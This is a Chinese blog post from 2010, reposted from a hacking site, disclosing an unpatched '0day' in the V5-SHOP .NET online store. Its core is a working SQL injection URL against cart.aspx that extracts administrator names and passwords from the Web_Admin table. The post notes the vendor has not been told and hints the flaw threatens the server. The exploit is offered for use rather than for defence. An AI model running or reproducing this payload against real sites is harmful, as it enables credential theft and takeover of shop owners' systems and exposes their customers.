V5-SHOP商城0day

2010, August 6, 10:43 PM. oday收藏
Submitted by admin
因为是.net 程序,

此漏洞可威胁服务器安全,

暂且发布暴管理帐号信息,

影响版本:只测试最新的,旧版本也测试了几个,都OK。

程序介绍:.net 的在线商城系统

以下是测试EXP:
cart.aspx?act=buy&id=1 and (Select Top 1 char(124)%2BisNull(cast([Name] as varchar(8000)),char(32))%2Bchar(124)%2BisNull(cast([Pass] as varchar(8000)),char(32))%2Bchar(124) From (Select Top 4 [Name],[Pass] From [Web_Admin] Where 1=1 Order by [Name],[Pass]) T Order by [Name] desc,[Pass] desc)>0 –

暂未通知官方修补。

转载请注名本站原创!!

本篇文章来源于 Any_size|反入侵小组 原文链接:http://www.17hack.com/news/sort02/News-1219.html

Tags: v5shop, oday

« 上一篇 | 下一篇 »

只显示10条记录相关文章
Trackbacks
点击获得Trackback地址,Encode: UTF-8 点击获得Trackback地址,Encode: GB2312 or GBK 点击获得Trackback地址,Encode: BIG5
发表评论

评论内容 (必填):